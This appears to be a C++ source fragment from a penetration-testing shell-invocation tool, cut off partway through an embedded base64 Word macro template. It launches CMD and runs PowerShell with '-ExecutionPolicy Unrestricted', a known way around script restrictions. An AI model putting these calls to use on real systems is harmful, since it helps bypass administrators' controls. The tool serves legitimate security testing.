#include ".\lib\invoker\invoker.h"
#include ".\lib\base64\base64.h"

void systemInvokeCmd() {
	system("CMD");
}

void systemInvokePs() {
	system("PowerShell -ExecutionPolicy Unrestricted -NoProfile");
}

void msInvokeAll() {
	// Microsoft Word document encoded in Base64
	std::string encoded = std::string("0M8R4KGxGuEAAAAAAAAAAAAAAAAAAA").append("AAPgADAP7/CQAGAAAAAAAAAAAAAAAB").append("AAAAKAAAAAAAAAAAEAAAKgAAAAIAAA").append("D+////AAAAACcAAAD/////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("///////////////////////spcEAfQ").append("AJBAAA8BK/AAAAAAAAEAAAAAAACAAA").append("OggAAA4AYmpiavbO9s4AAAAAAAAAAA").append("AAAAAAAAAAAAAJBBYANA4AAJSk5GaU").append("pORmOgAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAD//w8AAAAAAAAA").append("AAD//w8AAAAAAAAAAAD//w8AAAAAAA").append("AAAAAAAAAAAAAAALcAAAAAAEoHAAAA").append("AAAASgcAANwUAAAAAAAA3BQAAAAAAA").append("DcFAAAAAAAANwUAAAAAAAA3BQAABQA").append("AAAAAAAAAAAAAP////8AAAAA8BQAAA").append("AAAADwFAAAAAAAAPAUAAAAAAAA8BQA").append("AAwAAAD8FAAADAAAAPAUAAAAAAAA7h").append("YAAAwCAAAIFQAAAAAAAAgVAAAAAAAA").append("CBUAAAAAAAAIFQAAAAAAAAgVAAAAAA").append("AA4xUAAAAAAADjFQAAAAAAAOMVAAAA").append("AAAAbRYAAAIAAABvFgAAAAAAAG8WAA").append("AAAAAAbxYAAAAAAABvFgAAAAAAAG8W").append("AAAAAAAAbxYAACQAAAD6GAAAtgIAAL").append("AbAABWAAAAkxYAABUAAAAAAAAAAAAA").append("AAAAAAAAAAAA3BQAAAAAAADjFQAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAADjFQAA").append("AAAAAOMVAAAAAAAA4xUAAAAAAADjFQ").append("AAAAAAAJMWAAAAAAAAAAAAAAAAAADc").append("FAAAAAAAANwUAAAAAAAACBUAAAAAAA").append("AAAAAAAAAAAAgVAADbAAAAqBYAABYA").append("AAAdFgAAAAAAAB0WAAAAAAAAHRYAAA").append("AAAADjFQAAEAAAANwUAAAAAAAACBUA").append("AAAAAADcFAAAAAAAAAgVAAAAAAAAbR").append("YAAAAAAAAAAAAAAAAAAB0WAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAA4xUAAAAAAABtFgAAAAAAAAAAAA").append("AAAAAAHRYAAAAAAAAAAAAAAAAAAB0W").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAHRYAAAAAAAAIFQAA").append("AAAAAP////8AAAAAEO1A9w4R1gEAAA").append("AAAAAAAP////8AAAAA8xUAAAoAAAAd").append("FgAAAAAAAAAAAAAAAAAAWRYAABQAAA").append("C+FgAAMAAAAO4WAAAAAAAAHRYAAAAA").append("AAAGHAAAAAAAAP0VAAAQAAAABhwAAA").append("AAAAAdFgAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAYcAAAAAA").append("AAAAAAAAAAAADcFAAAAAAAAB0WAAA8").append("AAAA4xUAAAAAAADjFQAAAAAAAB0WAA").append("AAAAAA4xUAAAAAAADjFQAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAA4xUAAAAAAADjFQAAAAAA").append("AOMVAAAAAAAAkxYAAAAAAACTFgAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAADRYAABAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAOMVAAAAAAAA4xUAAAAAAA").append("DjFQAAAAAAAO4WAAAAAAAA4xUAAAAA").append("AADjFQAAAAAAAOMVAAAAAAAA4xUAAA").append("AAAAAAAAAAAAAAAP////8AAAAA////").append("/wAAAAD/////AAAAAAAAAAAAAAAA//").append("///wAAAAD/////AAAAAP////8AAAAA").append("/////wAAAAD/////AAAAAP////8AAA").append("AA/////wAAAAD/////AAAAAP////8A").append("AAAA/////wAAAAD/////AAAAAP////").append("8AAAAA/////wAAAAD/////AAAAAAYc").append("AAAAAAAA4xUAAAAAAADjFQAAAAAAAO").append("MVAAAAAAAA4xUAAAAAAADjFQAAAAAA").append("AOMVAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAADjFQ").append("AAAAAAAOMVAAAAAAAA4xUAAAAAAABK").append("BwAAWAwAAKITAAA6AQAABQASAQAACQ").append("QECAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAEludm9r").append("ZSBDTUQgYW5kIFBvd2VyU2hlbGwuDV").append("ByZXNzIEFMVCArIEYxMSB0byBlZGl0").append("IG1hY3JvLg0AAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAgAAAcIAAAPCA").append("AAEAgAABoIAAAbCAAALggAADIIAAA4").append("CAAAOQgAADoIAAD8+Pz08Pz0/Pz8AA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAABhZo").append("Gl8nAAAGFmjYFWMAAAYWaL59tgAABh").append("ZoEw4/AAoACAAAGwgAADoIAAD9AAAA").append("AAAAAAAAAAAA/QAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAABAAAA").append("AjIAMZBoATpwKhn0AB+wgi4gsMZBIb").append("CgBSKwoAUjkKAFJJCgBSWwAAAXsMQC").append("GLDEAgyQxAIAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAIgYPAB").append("IAAQB4AQ8ABwADAAMAAwACAAQACAAA").append("AJgAAACeAAAAngAAAJ4AAACeAAAAng").append("AAAJ4AAACeAAAAngAAADYGAAA2BgAA").append("NgYAADYGAAA2BgAANgYAADYGAAA2Bg").append("AANgYAAHYCAAB2AgAAdgIAAHYCAAB2").append("AgAAdgIAAHYCAAB2AgAAdgIAADYGAA").append("A2BgAANgYAADYGAAA2BgAANgYAAD4C").append("AAA2BgAANgYAADYGAAA2BgAANgYAAD").append("YGAAA2BgAANgYAADYGAAA2BgAANgYA").append("ADYGAAA2BgAANgYAADYGAAA2BgAANg").append("YAADYGAAA2BgAANgYAADYGAAA2BgAA").append("NgYAADYGAAA2BgAANgYAADYGAACoAA").append("AANgYAADYGAAAWAAAANgYAADYGAAA2").append("BgAANgYAADYGAAA2BgAANgYAADYGAA").append("C4AAAANgYAADYGAAA2BgAANgYAADYG").append("AAA2BgAANgYAADYGAAA2BgAANgYAAD").append("YGAAA2BgAAaAEAAEgBAAA2BgAANgYA").append("ADYGAAA2BgAANgYAADYGAAA2BgAANg").append("YAADYGAAA2BgAANgYAADYGAAA2BgAA").append("NgYAADYGAAA2BgAANgYAADYGAAA2Bg").append("AANgYAADYGAAA2BgAANgYAADYGAAA2").append("BgAANgYAADYGAAA2BgAANgYAADYGAA").append("A2BgAANgYAADYGAAA2BgAANgYAADYG").append("AAA2BgAANgYAADYGAAA2BgAANgYAAD").append("YGAAA2BgAANgYAADYGAAA2BgAANgYA").append("ADYGAAA2BgAANgYAADYGAAA2BgAANg").append("YAADYGAAA2BgAANgYAADYGAAA2BgAA").append("NgYAADYGAAA2BgAANgYAADYGAAA2Bg").append("AANgYAAHACAAA2BgAAMgYAABgAAADG").append("AwAA1gMAAOYDAAD2AwAABgQAABYEAA").append("AmBAAANgQAAEYEAABWBAAAZgQAAHYE").append("AACGBAAAlgQAAMYDAADWAwAA5gMAAP").append("YDAAAGBAAAFgQAADIGAAAoAgAA2AEA").append("AOgBAAAmBAAANgQAAEYEAABWBAAAZg").append("QAAHYEAACGBAAAlgQAAMYDAADWAwAA").append("5gMAAPYDAAAGBAAAFgQAACYEAAA2BA").append("AARgQAAFYEAABmBAAAdgQAAIYEAACW").append("BAAAxgMAANYDAADmAwAA9gMAAAYEAA").append("AWBAAAJgQAADYEAABGBAAAVgQAAGYE").append("AAB2BAAAhgQAAJYEAADGAwAA1gMAAO").append("YDAAD2AwAABgQAABYEAAAmBAAANgQA").append("AEYEAABWBAAAZgQAAHYEAACGBAAAlg").append("QAAMYDAADWAwAA5gMAAPYDAAAGBAAA").append("FgQAACYEAAA2BAAARgQAAFYEAABmBA").append("AAdgQAAIYEAACWBAAAxgMAANYDAADm").append("AwAA9gMAAAYEAAAWBAAAJgQAADYEAA").append("BGBAAAVgQAAGYEAAB2BAAAhgQAAJYE").append("AAA4AQAAWAEAAPgBAAAIAgAAGAIAAF").append("YCAAB+AgAAkAIAAKACAACwAgAAwAIA").append("ANACAACAAgAA4AIAAPACAAAAAwAAEA").append("MAACADAAAwAwAAQAMAAOACAADwAgAA").append("AAMAABADAAAgAwAAMAMAAEADAADgAg").append("AA8AIAAAADAAAQAwAAIAMAADADAABA").append("AwAA4AIAAPACAAAAAwAAEAMAACADAA").append("AwAwAAQAMAAOACAADwAgAAAAMAABAD").append("AAAgAwAAMAMAAEADAADgAgAA8AIAAA").append("ADAAAQAwAAIAMAADADAABAAwAA4AIA").append("APACAAAAAwAAEAMAACADAAAwAwAAQA").append("MAAOACAADwAgAAAAMAABADAAAgAwAA").append("MAMAAEADAADgAgAA8AIAAAADAAAQAw").append("AAIAMAADADAABAAwAA4AIAAPACAAAA").append("AwAAEAMAACADAAAwAwAAQAMAAOACAA").append("DwAgAAAAMAABADAAAgAwAAMAMAAEAD").append("AADgAgAA8AIAAAADAAAQAwAAIAMAAD").append("ADAABAAwAA4AIAAPACAAAAAwAAEAMA").append("ACADAAAwAwAAQAMAAOACAADwAgAAAA").append("MAABADAAAgAwAAMAMAAEADAAA2BgAA").append("NgYAADYGAAA2BgAANgYAACQAAABPSg").append("MAUEoDAFFKAwBeSgIAX0gBBG1ICQRu").append("SAQIc0gJBHRIBAgAAAAASgAAYPH/Ag").append("BKAAwQAAAAAAAAAAAGAE4AbwByAG0A").append("YQBsAAAADAAAABJkAwEBABSkoAAYAE").append("NKFgBfSAEEYUoWAG1ICQRzSAkEdEgJ").append("BAAAAAAAAAAAAAAAAAAAAAAAAEQAQS").append("Dy/6EARAAMDQAAAAAAABAAFgBEAGUA").append("ZgBhAHUAbAB0ACAAUABhAHIAYQBnAH").append("IAYQBwAGgAIABGAG8AbgB0AAAAAABS").append("AGkA8/+zAFIADA0AAAAAAAAwBgwAVA").append("BhAGIAbABlACAATgBvAHIAbQBhAGwA").append("AAAcABf2AwAANNYGAAEKA2wANNYGAA").append("EFAwAAYfYDAAACAAsAAAAoAGsg9P/B").append("ACgAAA0AAAAAAAAwBgcATgBvACAATA").append("BpAHMAdAAAAAIADAAAAAAAUEsDBBQA").append("BgAIAAAAIQDp3g+//wAAABwCAAATAA").append("AAW0NvbnRlbnRfVHlwZXNdLnhtbKyR").append("y07DMBBF90j8g+UtSpyyQAgl6YLHjs").append("eifMDImSQWydiyp1X790zSVEKoIBZs").append("LNkz954743K9Hwe1w5icp0qv8kIrJO").append("sbR12l3zdP2a1WiYEaGDxhpQ+Y9Lq+").append("vCg3h4BJiZpSpXvmcGdMsj2OkHIfkK").append("TS+jgCyzV2JoD9gA7NdVHcGOuJkTjj").append("yUPX5QO2sB1YPe7l+Zgk4pC0uj82Tq").append("xKQwiDs8CS1Oyo+UbJFkIuyrkn9S6k").append("K4mhzVnCVPkZsOheZTXRNajeIPILjB").append("LDsAyJX89nIBkt5r87nons29ZZbLzd").append("jrKOfDZezE7B/xRg9T/oE9PMf1t/Ag").append("AA//8DAFBLAwQUAAYACAAAACEApdan").append("58AAAAA2AQAACwAAAF9yZWxzLy5yZW").append("xzhI/PasMwDIfvhb2D0X1R0sMYJXYv").append("pZBDL6N9AOEof2giG9sb69tPxwYKuw").append("iEpO/3qT3+rov54ZTnIBaaqgbD4kM/").append("y2jhdj2/f4LJhaSnJQhbeHCGo3vbtV").append("+8UNGjPM0xG6VItjCVEg+I2U+8Uq5C").append("ZNHJENJKRds0YiR/p5FxX9cfmJ4Z4D").append("ZM0/UWUtc3YK6PqMn/s8MwzJ5PwX+v").append("LOVFBG43lExp5GKhqC/jU72QqGWq1B").append("7Qtbj51v0BAAD//wMAUEsDBBQABgAI").append("AAAAIQBreZYWgwAAAIoAAAAcAAAAdG").append("hlbWUvdGhlbWUvdGhlbWVNYW5hZ2Vy").append("LnhtbAzMTQrDIBBA4X2hd5DZN2O7KE").append("Vissuuu/YAQ5waQceg0p/b1+XjgzfO").append("3xTVm0sNWSycBw2KZc0uiLfwfCynG6").append("jaSBzFLGzhxxXm6XgYybSNE99JyHNR").append("fSPVkIWttd0g1rUr1SHvLN1euSRqPY").append("tHV+jT9yniResrJgoCOP0BAAD//wMA").append("UEsDBBQABgAIAAAAIQDCOo714AYAAL").append("MfAAAWAAAAdGhlbWUvdGhlbWUvdGhl").append("bWUxLnhtbOxZS28bNxC+F+h/WOy9sW").append("TrERuRA+sVN/ELkZIiR0pL7dLiLhck").append("ZUe3Ijn1UqBAWvTQAL31UBQN0AANeu").append("mPMeCgTX9Eh1xpl5So+IEUCApbgKGl").append("vhl+nJmdmZ29c/dpTL0TzAVhScMv3y").append("r5Hk6GLCBJ2PAf9buf3fY9IVESIMoS").append("3PCnWPh3tz/95A7akhGOsQfyidhCDT").append("+SMt1aWxNDWEbiFktxAr+NGI+RhEse").append("rgUcnYLemK6tl0q1tRiRxPcSFIPaw9").append("GIDLHXVyr97bnyDoXLRAq1MKS8p1Rj").append("S0Jjg3FZIcRUtCj3ThBt+LBPwE77+K").append("n0PYqEhB8afkn/+Wvbd9bQ1kyIyhWy").append("hlxX/83kZgLBeF3vycNBvmmlUq3Udn").append("L9GkDlMq5T79Q6tVyfBqDhEE6acbF1").append("1tdblRnWAGVfHbrb9fZG2cIb+jeWOO").append("9U1cfCa1Cmv7KE73ZbYEULr0EZvrqE").append("rzY3m21bvwZl+NoSvl7aaVfqln4Nii").append("hJxkvoUrW20ZqfNoeMGN11wjerlW59").append("faa8QEE05NGlthixRK6KtRgdM94FgA").append("JSJEniyWmKR2gIUdxClAw48fZIGEHg").append("pShhApZL66VuaQP+q09Ff9MeRVsYGd").append("KKFzARS0uKjyeGnKSy4d8Hrb4BOX/z").append("5uzZ67Nnv589f3727NfZ3lqVJbeLkt").append("CUe/fTN/+8/NL7+7cf3734Ntt6ES9M").append("/Ntfvnr7x5/vUw8nLkxx/t2rt69fnX").append("//9V8/v3Bo3+FoYML7JMbCO8Cn3kMW").append("wwEd/PGAX02iHyFiSuwkoUAJUrs49H").append("dkZKEPpogiB66JbTs+5pBqXMB7k2OL").append("cC/iE0kcGh9EsQXcZ4w2GXda4YHayz").append("Bzf5KE7s35xMQ9ROjEtXcLJZaXO5MU").append("cixxqWxF2KJ5RFEiUYgTLD31Gxtj7D").append("jdE0Isu+6TIWeCjaT3hHhNRJwm6ZOB").append("FU2F0C6JwS9TF0Hwt2Wb/cdek1HXqd").append("v4xEbCvYGog3wfU8uM99BEotilso9i").append("ahp8D8nIRbI35UMT1xESPB1iyrxOgI").append("VwyRxyOK/h9AeQZtxu36fT2EZyScYu").append("nXuIMRPZZuNWhOLUhe2RJDKxn4sxhC").append("jyjph0wfeZfYeoa/ADSla6+zHBlrsv").append("zgaPIMOalIoAUb9MuMOX9zCz4rc3pS").append("OEXalmh8dWit3hxBkdzUlohfYexhSd").append("ogBj79HnDgZNllo2L0jfjyCr7GJXYN").append("1Hdqyq6wQL6JVUc7OcJ/eIsEK2h0O2").append("gs/+dCHxTFESI75K8wF43bR5B0pd7A").append("qAQzocm8ADAj0gxIvTKIcCdBjBvVLr").append("UYSsAqauhTtep9zy32XuMbgvjy0al7").append("gvQQZfWQYSuynzXtv0EbU2KAKmj6DL").append("cKVbELHcX4io4qrFJk65kX3TFm6A7s").append("hqemKSXNgBLfQ+1f+u94EO4/yHl477").append("4MP0O27FVrK6YqezKpnsLvQ3q3CLXU").append("2L8YB8/E1NG02SIwx1ZDlj3fQ0Nz2N").append("/7/vaVbdzzedzKp+46aT8aHDuOlkZs").append("OVD9PJFM0L9DVq4JENevTYJ1459RkR").append("SntySvGe0IMfAc8zQRcWlZyeeOJ8Cp").append("hG8FWVOdjAwoUcaRmPM/kFkVEvQilM").append("h8q+UhKKmepQeCkTMDTSy07dCk8n8T").append("4LsmFnuawGm1llFUgW66Vqvg6DKpmh").append("a/VigJer12xDPWidE1CyVyFhbGaT2H").append("CQqM8XlZH0WBeM5iChT/ZBWGw6WNxW").append("6ueuWmIB1HKvwAO3B4/pDb9aAREQgn").append("kcNOeB8lPm6rl3tTM/pKdXGdOKAGiw").append("5xFQeHpTcV15PHW6LNQu4WmLhBFuNg").append("ltGd3giQgeg2fRqVYvQ+Oqvt4sXGrR").append("U6bQ+0FoFTTqt9/H4rq+BrnF3EATM1").append("PQxDtt+LWNKoTMEKUNfwRDY/gapxA7").append("Qj1zIRrCm5eh5NkNf53MknIh20hEmc").append("F10smyQUwk5h4lccNXx8/dQBOdQzS3").append("8jokhI+W3CaklY+NHDjddjIejfBQmm").append("43VpSls0vI8FmucP6qxa8PVpJsAu7u").append("RcGpN6AT/hBBiFXrZWXAgAh4d1DOrB").append("kQeBmWJ7Ii/hYK0yztmm+jdAxl64im").append("EZpVFDOZZ3CdynM6+iq3gXE1OzMY1D").append("DJrBAOQlVgTaNa1TSvGhmHlVX3YiFl").append("OSNpFjXTyiqqarqzmLXDvAws2PJ6Rd").append("5gNTcx5DSzwmepezHlbs5z3UKfkFcJ").append("MHhuP0fVvURBMKgVm1nUFOPlNKxy9m").append("zVrh3zA15A7TJFwsj6tbnaBbvlNcK5").append("HSxeq/KD3GLUwtJo3ldqS+u35uaLbT").append("Y4huTRhi53QqXQroTJLkfQEPV0T5Kn").append("DS26/S8AAAD//wMAUEsDBBQABgAIAA").append("AAIQAN0ZCftgAAABsBAAAnAAAAdGhl").append("bWUvdGhlbWUvX3JlbHMvdGhlbWVNYW").append("5hZ2VyLnhtbC5yZWxzhI9NCsIwFIT3").append("gncIb2/TuhCRJt2I0K3UA4TkNQ02Py").append("RR7O0NriwILodhvplpu5edyRNjMt4x").append("aKoaCDrplXGawW247I5AUhZOidk7ZL").append("Bggo5vN+0VZ5FLKE0mJFIoLjGYcg4n").append("SpOc0IpU+YCuOKOPVuQio6ZByLvQSP").append("d1faDxmwF8xSS9YhB71QAZllCa/7P9").append("OBqJZy8fFl3+UUFz2YUFKKLGzOAjm6").append("pMBMpburrE3wAAAP//AwBQSwECLQAU").append("AAYACAAAACEA6d4Pv/8AAAAcAgAAEw").append("AAAAAAAAAAAAAAAAAAAAAAW0NvbnRl").append("bnRfVHlwZXNdLnhtbFBLAQItABQABg").append("AIAAAAIQCl1qfnwAAAADYBAAALAAAA").append("AAAAAAAAAAAAADABAABfcmVscy8ucm").append("Vsc1BLAQItABQABgAIAAAAIQBreZYW").append("gwAAAIoAAAAcAAAAAAAAAAAAAAAAAB").append("kCAAB0aGVtZS90aGVtZS90aGVtZU1h").append("bmFnZXIueG1sUEsBAi0AFAAGAAgAAA").append("AhAMI6jvXgBgAAsx8AABYAAAAAAAAA").append("AAAAAAAA1gIAAHRoZW1lL3RoZW1lL3").append("RoZW1lMS54bWxQSwECLQAUAAYACAAA").append("ACEADdGQn7YAAAAbAQAAJwAAAAAAAA").append("AAAAAAAADqCQAAdGhlbWUvdGhlbWUv").append("X3JlbHMvdGhlbWVNYW5hZ2VyLnhtbC").append("5yZWxzUEsFBgAAAAAFAAUAXQEAAOUK").append("AAAAADw/eG1sIHZlcnNpb249IjEuMC").append("IgZW5jb2Rpbmc9IlVURi04IiBzdGFu").append("ZGFsb25lPSJ5ZXMiPz4NCjxhOmNsck").append("1hcCB4bWxuczphPSJodHRwOi8vc2No").append("ZW1hcy5vcGVueG1sZm9ybWF0cy5vcm").append("cvZHJhd2luZ21sLzIwMDYvbWFpbiIg").append("YmcxPSJsdDEiIHR4MT0iZGsxIiBiZz").append("I9Imx0MiIgdHgyPSJkazIiIGFjY2Vu").append("dDE9ImFjY2VudDEiIGFjY2VudDI9Im").append("FjY2VudDIiIGFjY2VudDM9ImFjY2Vu").append("dDMiIGFjY2VudDQ9ImFjY2VudDQiIG").append("FjY2VudDU9ImFjY2VudDUiIGFjY2Vu").append("dDY9ImFjY2VudDYiIGhsaW5rPSJobG").append("luayIgZm9sSGxpbms9ImZvbEhsaW5r").append("Ii8+AAAAADoAAAAQAAAOAAAAAP////").append("8ACAAAOggAAAUAAAAACAAAOggAAAYA").append("AAAPAADwOAAAAAAABvAYAAAAAgQAAA").append("IAAAABAAAAAQAAAAEAAAACAAAAQAAe").append("8RAAAAD//wAAAAD/AICAgAD3AAAQAA").append("8AAvCSAAAAEAAI8AgAAAABAAAAAQQA").append("AA8AA/AwAAAADwAE8CgAAAABAAnwEA").append("AAAAAAAAAAAAAAAAAAAAAAAAACAArw").append("CAAAAAAEAAAFAAAADwAE8EIAAAASAA").append("rwCAAAAAEEAAAADgAAUwAL8B4AAAC/").append("AQAAEADLAQAAAAD/AQAACAAEAwkAAA").append("A/AwEAAQAAABHwBAAAAAEAAAAAAAAA").append("GQAAADwAAAADAAcAAAAAADwAAAAHAA").append("AAAAA5AAAAPAAAAAQABwAAAAAAOQAA").append("ADwAAAAEAAcACQAAAAQAAAAIAAAA5Q").append("AAAAAAAAAHAAAA8W4eABpfJwATDj8A").append("ilxMANgVYwC+fbYAYnu7AJE04AAqGf").append("QAAAAAADoAAAA8AAAAAAAAAAEAAAD/").append("QAGAAQAaAAAAGgAAAAAAAAABAAEAGg").append("AAAAAAAAAaAAAAAAAAAAIQAAAAAAAA").append("ADoAAACAAAAQAEAAAP//AQAAAAcAVQ").append("BuAGsAbgBvAHcAbgD//wEACAAAAAAA").append("AAAAAAAA//8BAAAAAAD//wAAAgD//w").append("AAAAD//wAAAgD//wAAAAAIAAAARx6Q").append("AQAAAgIGAwUEBQIDBP8uAOBbeADACQ").append("AAAAAAAAD/AQAAAAAAAFQAaQBtAGUA").append("cwAgAE4AZQB3ACAAUgBvAG0AYQBuAA").append("AANR6QAQIABQUBAgEHBgIFBwAAAAAA").append("AAAQAAAAAAAAAAAAAACAAAAAAFMAeQ").append("BtAGIAbwBsAAAAMy6QAQAAAgsGBAIC").append("AgICBP8uAOBbeADACQAAAAAAAAD/AQ").append("AAAAAAAEEAcgBpAGEAbAAAADcukAEA").append("AAIPBQICAgQDAgT/LgDkeyQAwAkAAA").append("AAAAAA/wEAAAAAAABDAGEAbABpAGIA").append("cgBpAAAAVw4sAYYPAgEGAAMBAQEBAb").append("8CAKD6fM84FgAAAAAAAAAPAAQAAAAA").append("AEQAZQBuAGcAWABpAGEAbgAgAEwAaQ").append("BnAGgAdAAAAEl7v34gAEwAaQBnAGgA").append("dAAAAEMuLAEAAAIP